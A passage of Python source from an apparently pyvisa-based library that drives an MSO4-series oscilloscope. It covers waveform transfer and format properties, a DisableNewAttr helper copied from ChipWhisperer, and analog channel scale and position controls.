				raise ValueError(f'Invalid source {v}. Valid sources are ch1-ch{self._ch_a_count}')
		self.sc.write(f'DATa:SOUrce {" ".join(value)}')

	@property
	def wfm_start(self) -> int:
		'''The starting data point for waveform transfer.

		*Not cached*

		:Getter: Return the start index

		:Setter: Set the start index
		'''
		return int(self.sc.query('DATa:STARt?').strip())
	@wfm_start.setter
	def wfm_start(self, value: int):
		if not isinstance(value, int):
			raise ValueError(f'Invalid start index {value}. Must be an int.')
		self.sc.write(f'DATa:STARt {value}')

	@property
	def wfm_stop(self) -> int:
		'''The last data point that will be transferred when retrieving the waveform.

		*Not cached*

		:Getter: Return the stop index

		:Setter: Set the stop index
		'''
		return int(self.sc.query('DATa:STOP?').strip())
	@wfm_stop.setter
	def wfm_stop(self, value: int):
		if not isinstance(value, int):
			raise ValueError(f'Invalid stop index {value}. Must be an int.')
		self.sc.write(f'DATa:STOP {value}')

	@property
	def wfm_len(self) -> int:
		'''The number of data points in the waveform.

		*Not cached*

		:Getter: Return the number of data points
		'''
		return int(self.sc.query('WFMOutpre:NR_Pt?').strip())

	@property
	def wfm_encoding(self) -> str:
		'''The encoding of the waveform data.  Valid values are:
			* ``binary``: Binary
			* ``ascii``: ASCII

		*Cached*

		:Getter: Return the encoding

		:Setter: Set the encoding

		Raises:
			ValueError: Invalid encoding
		'''
		if self._cached_wfm_encoding is None:
			self._cached_wfm_encoding = self.sc.query('WFMOutpre:ENCdg?').strip().lower()
		return self._cached_wfm_encoding
	@wfm_encoding.setter
	def wfm_encoding(self, value: str):
		if value.lower() not in self._wfm_encodings:
			raise ValueError(f'Invalid encoding {value}. Valid encodings are {self._wfm_encodings}')
		if self._cached_wfm_encoding == value:
			return
		self._cached_wfm_encoding = value
		self.sc.write(f'WFMOutpre:ENCdg {value}')

	@property
	def wfm_binary_format(self) -> str:
		'''The data format of binary waveform data. Valid values are:
			* ``ri``: Signed integer
			* ``rp``: Unsigned integer
			* ``fp``: Floating point

		*Cached*

		:Getter: Return the data format

		:Setter: Set the data format

		Raises:
			ValueError: Invalid data format
		'''
		if self._cached_wfm_format is None:
			self._cached_wfm_format = self.sc.query('WFMOutpre:BN_Fmt?').strip().lower()
		return self._cached_wfm_format
	@wfm_binary_format.setter
	def wfm_binary_format(self, value: str):
		if value.lower() not in self._wfm_binary_formats:
			raise ValueError(f'Invalid binary format {value}. Valid binary formats are {self._wfm_binary_formats}')
		if self._cached_wfm_format == value:
			return
		self._cached_wfm_format = value
		self.sc.write(f'WFMOutpre:BN_Fmt {value}')

	@property
	def wfm_byte_nr(self) -> int:
		'''The number of bytes per data point in the waveform.

		*Cached*

		:Getter: Return the number of bytes per data point

		:Setter: Set the number of bytes per data point
			NOTE: Check the programmer manual for valid values § WFMOutpre:BYT_Nr. If unsure, clear the cache with :code:`scope._clear_cache()` and read back the value
		'''
		if self._cached_wfm_byte_nr is None:
			self._cached_wfm_byte_nr = int(self.sc.query('WFMOutpre:BYT_Nr?').strip())
		return self._cached_wfm_byte_nr
	@wfm_byte_nr.setter
	def wfm_byte_nr(self, value: int):
		if not isinstance(value, int):
			raise ValueError(f'Invalid number of bytes per data point {value}. Must be an int.')
		if value not in self._wfm_byte_nrs:
			raise ValueError(f'Invalid number of bytes per data point {value}. Valid values are {self._wfm_byte_nrs}')
		if self._cached_wfm_byte_nr == value:
			return
		self._cached_wfm_byte_nr = value
		self.sc.write(f'WFMOutpre:BYT_Nr {value}')

	@property
	def wfm_byte_order(self) -> str:
		'''The byte order of the waveform data. Valid values are:
			* ``lsb``: Least significant byte first
			* ``msb``: Most significant byte first

		*Cached*

		:Getter: Return the byte order

		:Setter: Set the byte order

		Raises:
			ValueError: Invalid byte order
		'''
		if self._cached_wfm_order is None:
			self._cached_wfm_order = self.sc.query('WFMOutpre:BYT_Or?').strip().lower()
		return self._cached_wfm_order
	@wfm_byte_order.setter
	def wfm_byte_order(self, value: str):
		if value.lower() not in self._wfm_byte_orders:
			raise ValueError(f'Invalid byte order {value}. Valid byte orders are {self._wfm_byte_orders}')
		if self._cached_wfm_order == value:
			return
		self._cached_wfm_order = value
		self.sc.write(f'WFMOutpre:BYT_Or {value}')

	@property
	def is_big_endian(self) -> bool:
		'''Return True if the byte order is big endian, False otherwise.

		*Cached*
		'''
		return self.wfm_byte_order == 'msb'

	@property
	def curvestream(self) -> bool:
		'''Enable or disable curvestream mode.

		*Cached*

		:Getter: Return the curvestream state

		:Setter: Set the curvestream state
		'''
		if self._cached_curvestream is None:
			self.sc.write('*CLS') # If we don't know, better disable it to be sure
			self._cached_curvestream = False
		return self._cached_curvestream
	@curvestream.setter
	def curvestream(self, value: bool):
		self._cached_curvestream = value
		if value:
			self.sc.write('CURVestream?')
		else:
			self.sc.write('*CLS')

	@property
	def fast_acq(self) -> bool:
		'''Enable or disable fast acquisition mode.

		*Cached*

		:Getter: Return the fast acquisition state

		:Setter: Set the fast acquisition state
		'''
		if self._cached_fast_acq is None:
			self._cached_fast_acq = bool(int(self.sc.query("ACQuire:FASTAcq:STATE?").strip()))
		return self._cached_fast_acq
	@fast_acq.setter
	def fast_acq(self, value: bool):
		if self._cached_fast_acq == value:
			return
		self._cached_fast_acq = value
		self.sc.write(f'ACQuire:FASTAcq:STATE {int(value)}')

	def get_datatype(self) -> BINARY_DATATYPES:
		'''Get the data type of the binary waveform data in struct.pack form. Does not return endianess.

		*Cached*
		'''
		return self._wfm_datatypes[self.wfm_byte_nr][self.wfm_binary_format]



from typing import List
from . import scope_logger

class DisableNewAttr(object):
    # Copied from https://github.com/newaetech/chipwhisperer/blob/develop/software/chipwhisperer/common/utils/util.py
    """Provides an ability to disable setting new attributes in a class, useful to prevent typos.

    Usage:
    1. Make a class that inherits this class:
    >>> class MyClass(DisableNewAttr):
    >>>     # Your class definition here

    2. After setting up all attributes that your object needs, call disable_newattr():
    >>>     def __init__(self):
    >>>         self.my_attr = 123
    >>>         self.disable_newattr()

    3. Subclasses raise an AttributeError when trying to make a new attribute:
    >>> obj = MyClass()
    >>> #obj.my_new_attr = 456   <-- Raises AttributeError
    """
    _new_attributes_disabled = False
    _new_attributes_disabled_strict = False
    _read_only_attrs : List[str] = []

    def __init__(self):
        self._read_only_attrs = []
        self.enable_newattr()

    def disable_newattr(self):
        self._new_attributes_disabled = True
        self._new_attributes_disabled_strict = False

    def enable_newattr(self):
        self._new_attributes_disabled = False
        self._new_attributes_disabled_strict = False

    def disable_strict_newattr(self):
        self._new_attributes_disabled = True
        self._new_attributes_disabled_strict = True

    def add_read_only(self, name):
        if isinstance(name, list):
            for a in name:
                self.add_read_only(a)
            return
        if name in self._read_only_attrs:
            return
        self._read_only_attrs.append(name)

    def remove_read_only(self, name):
        if isinstance(name, list):
            for a in name:
                self.remove_read_only(a)
                return
        if name in self._read_only_attrs:
            self._read_only_attrs.remove(name)

    def __setattr__(self, name, value):
        if hasattr(self, '_new_attributes_disabled') and self._new_attributes_disabled and not hasattr(self, name):  # would this create a new attribute?
            #raise AttributeError("Attempt to set unknown attribute in %s"%self.__class__, name)
            scope_logger.error("Setting unknown attribute {} in {}".format(name, self.__class__))
            if hasattr(self, '_new_attributes_disabled_strict') and self._new_attributes_disabled_strict and not hasattr(self, name):
                raise AttributeError("Attempt to set unknown attribute in %s"%self.__class__, name)
        if name in self._read_only_attrs:
            raise AttributeError("Attribute {} is read-only!".format(name))
        super(DisableNewAttr, self).__setattr__(name, value)



import pyvisa

from . import util
from . import scope_logger

class MSO4AnalogChannel(util.DisableNewAttr):
	'''Settings for each analog channel'''
	
	def __init__(self, res: pyvisa.resources.MessageBasedResource, channel: int):
		'''Creates a new channel object

		Args:
			res: The VISA resource to use for communication
			channel: The channel number (1-n)
		'''
		super().__init__()

		self.sc = res
		self.channel = channel

		self.disable_newattr()

	def clear_caches(self):
		'''Clear channel caches'''
		# No caches to clear, implemented to have a consistent interface
		pass

	@property
	def enable(self) -> bool:
		'''Enables the channel.

		*Not cached*

		:Getter: Return the enable status

		:Setter: Set the enable status
		'''
		return bool(int(self.sc.query(f'SELect:CH{self.channel}?').strip()))
	@enable.setter
	def enable(self, value: bool):
		if not isinstance(value, bool):
			raise ValueError(f'Invalid enable {value}. Must be bool')
		self.sc.write(f'SELect:CH{self.channel} {int(value)}')

	@property
	def scale(self) -> float:
		'''Sets the vertical scale of the waveform.

		*Not cached*

		:Getter: Return the scale in V (float)

		:Setter: Set the scale in V (int or float)
		'''
		return float(self.sc.query(f'CH{self.channel}:SCAle?').strip())
	@scale.setter
	def scale(self, value: float | int):
		if not isinstance(value, float) and not isinstance(value, int):
			raise ValueError(f'Invalid scale {value}. Must be float or int')
		self.sc.write(f'CH{self.channel}:SCAle {value}')
		# Check if the scale was set correctly
		actual = self.scale
		if actual != value:
			scope_logger.warning('Channel %d scale was set to %f V, but is actually %f V', self.channel, value, actual)

	@property
	def position(self) -> float:
		'''Sets the vertical position of the waveform.

		*Not cached*

		:Getter: Return the position in V (float)

		:Setter: Set the position in V (int or float)
		'''
		return float(self.sc.query(f'CH{self.channel}:POSition?').strip())
	@position.setter
	def position(self, value: float | int):
		if not isinstance(value, float) and not isinstance(value, int):
			raise ValueError(f'Invalid position {value}. Must be float or int')
		self.sc.write(f'CH{self.channel}:POSition {value}')
		# Check if the position was set correctly
		actual = self.position
		if actual != value:
			scope_logger.warning('Channel %d position was set to %f V, but is actually %f V', self.channel, value, actual)
